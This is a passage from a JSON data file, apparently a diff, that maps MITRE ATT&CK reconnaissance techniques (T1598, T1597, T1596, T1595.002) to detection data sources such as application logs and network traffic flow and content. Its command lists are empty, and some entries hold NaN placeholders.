This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1598.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": 
"application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1598.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": 
"application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1598", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": 
"application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1597.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1597.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1597", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.005", + 
"command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + 
"relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1596", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1595.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
